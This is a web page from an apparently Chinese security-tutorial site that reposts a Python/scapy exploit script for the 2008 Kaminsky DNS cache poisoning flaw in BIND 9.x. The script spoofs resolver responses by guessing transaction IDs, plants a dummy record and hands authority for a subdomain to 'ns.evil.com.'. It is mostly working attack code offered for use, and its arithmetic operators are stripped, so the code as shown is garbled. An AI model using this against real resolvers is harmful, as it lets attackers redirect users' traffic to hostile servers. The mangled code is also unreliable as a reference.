• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py) ,其中包含myeclipse 9.x crack,adobe reader 9.x,新点软件9.x,飞腾fit windows 9.x,9.x等知识点,遇到此问题的同学们可以参考下
from scapy import *
import random # Copyright (C) 2008 Julien Desfossez <ju@klipix.org>
# http://www.solisproject.net/
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # This script exploit the flaw discovered by Dan Kaminsky
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
# http://www.kb.cert.org/vuls/id/800113 # It tries to insert a dummy record in the vulnerable DNS server by guessing
# the transaction ID.
# It also insert Authority record for a valid record of the target domain. # To use this script, you have to discover the source port used by the vulnerable
# DNS server.
# Python is really slow, so it will take some time, but it works :-)
# IP to insert for our dummy record
targetip = "X.X.X.X"
# Vulnerable recursive DNS server
targetdns = "X.X.X.X"
# Authoritative NS for the target domain
srcdns = ["X.X.X.X"] # Domain to play with
dummydomain = ""
basedomain = ".example.com."
# sub-domain to claim authority on
domain = "sub.example.com."
# Spoofed authoritative DNS for the sub-domain
spoof="ns.evil.com."
# src port of vulnerable DNS for recursive queries
dnsport = 32883 # base packet
rep = IP(dst=targetdns, src=srcdns[0])/ \
UDP(sport=53, dport=dnsport)/ \
DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0,
qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),
an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),
ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof) 1, type=2)
)
currentid = 1024
dummyid = 3
while 1:
dummydomain = "a" str(dummyid) basedomain
dummyid = dummyid 1
# request for our dummydomain
req = IP(dst=targetdns)/ \
UDP(sport=random.randint(1025, 65000), dport=53)/ \
DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,
qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),
an=0,
ns=0,
ar=0
)
send(req) # build the response
rep.getlayer(DNS).qd.qname = dummydomain
rep.getlayer(DNS).an.rrname = dummydomain for i in range(50):
# TXID
rep.getlayer(DNS).id = currentid
currentid = currentid 1
if currentid == 65536:
currentid = 1024 # len and chksum
rep.getlayer(UDP).len = IP(str(rep)).len-20
rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)
send(rep, verbose=0) # check to see if it worked
req = IP(dst=targetdns)/ \
UDP(sport=random.randint(1025, 65000), dport=53)/ \
DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,
qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),
an=0,
ns=0,
ar=0
)
z = sr1(req, timeout=2, retry=0, verbose=0)
try:
if z[DNS].an.rdata == targetip:
print "Successfully poisonned our target with a dummy record !!"
break
except:
print "Poisonning failed"

</div>

您可能想查找下面的文章:

  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

相关文章

  • AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
  • Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
  • Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
  • Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
  • Simple DNS Plus
  • MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
  • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
    • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
    • tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
    • Ultrastats
    • BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
    • webEdition CMS (we_objectID) Blind SQL Injection Exploit
    • PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
    • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
    • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有